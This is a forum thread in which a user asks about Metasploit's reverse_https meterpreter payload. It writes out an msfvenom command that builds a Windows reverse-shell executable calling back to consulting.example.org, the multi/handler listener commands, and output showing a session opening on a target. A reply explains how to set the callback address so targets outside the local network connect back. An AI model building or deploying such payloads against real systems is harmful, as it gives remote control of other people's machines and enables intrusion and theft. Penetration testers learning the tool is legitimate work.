Results 1 to 3 of 3

Thread: meterpreter/reverse_https confusion

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default meterpreter/reverse_https confusion

    Hi all,

    Im a bit confused as to the use for meterpreter/reverse_https.

    Maybe someone cold shed some light on it.

    Before I have used reverse_tcp and reverse_tcp_allports across the wan to public ip then port forwarded to local ip.works yeah!

    I want to use the no-ip client in wine which runs ok .
    Following the steps below I come across the multi/handler = LHOST and it states no-ip address *
    shouldnt this be the local ip or does this handler connect out and meet the reverse connection at the no-ip address without port
    forwarding to make the connection?

    Please advise.



    The command line below will generate a Windows executable that uses the new HTTPS stager:



    $ msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=consulting.example.org LPORT=4443 > metasploit_https.exe

    #This sequence of Metasploit Console commands will configure a listener to handle the requests:

    Using no-ip DUC client in wine to my no-ip address with port forwarded

    $ ./msfconsole

    msf> use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

    *msf exploit(handler) > set LHOST consulting.example.org (shouldnt this be local host ) ie. 192.168.0.6

    msf exploit(handler) > set LPORT 4443

    msf exploit(handler) > set SessionCommunicationTimeout 0

    msf exploit(handler) > set ExitOnSession false

    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [*] Started HTTPS reverse handler on https://consulting.example.org:4443/
    [*] Starting the payload handler...





    Running the executable on the target results in:


    [*] 192.168.0.129:51375 Request received for /INITM...
    [*] 192.168.0.129:51375 Staging connection for target /INITM received...
    [*] Patched transport at offset 486516...
    [*] Patched URL at offset 486248...
    [*] Patched Expiration Timeout at offset 641856...
    [*] Patched Communication Timeout at offset 641860...
    [*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51375) at 2011-06-29 02:43:55 -0500



    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...

    I thought this would be local ip as no-ip DUC redirects the dns to the public ip then forwarded to the local ip . maybe im wrong?


    Kind Regards
    Dee

  2. #2
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: meterpreter/reverse_https confusion

    oh please!!!! 130 views no feedback ? confusion sorted. close thread .

  3. #3
    Junior Member L21ZIFER's Avatar
    Join Date
    Nov 2011
    Posts
    47

    Default Re: meterpreter/reverse_https confusion

    First: There is a noip-client for BT available already, try apt-get noip2
    Second: When you try to redirect the exploited system to your computer externally (this means, the ex. system is not in your local network), then you obviously have to give your external IP to the LHOST var. If your exploited system is in your local network, then giving your local ip is enough.

Similar Threads

  1. Replies: 2
    Last Post: 03-23-2011, 09:36 PM
  2. BT 3 USB confusion
    By iamjoe in forum Beginners Forum
    Replies: 1
    Last Post: 03-06-2011, 08:27 AM
  3. reverse_https problem
    By AngryCockroach in forum Beginners Forum
    Replies: 0
    Last Post: 04-19-2010, 09:06 AM
  4. Replies: 1
    Last Post: 04-19-2009, 03:41 AM
  5. KDE / Flux confusion
    By Vodkabot in forum OLD Newbie Area
    Replies: 0
    Last Post: 12-16-2007, 10:54 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •